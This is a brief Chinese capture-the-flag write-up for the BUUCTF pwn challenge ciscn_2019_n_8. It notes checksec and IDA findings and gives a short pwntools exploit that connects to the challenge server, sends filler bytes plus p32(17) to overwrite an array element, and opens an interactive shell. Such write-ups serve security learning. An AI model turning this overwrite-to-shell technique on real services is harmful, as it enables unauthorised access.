BUUCTF-PWN-ciscn_2019_n_8

checksec

image-20211114180014810

新手小白表示第一次碰到保护全开,有点震惊

IDA

image-20211114181217669

看完IDA反向震惊,似乎只要var[13] == 17就好了

EXP

1
2
3
4
5
6
7
8
9
from pwn import *

p = remote('node4.buuoj.cn', 26178)

payload = b'aaaa' * 13 + p32(17)

p.sendlineafter('\n', payload)

p.interactive()

结果

image-20211114182326535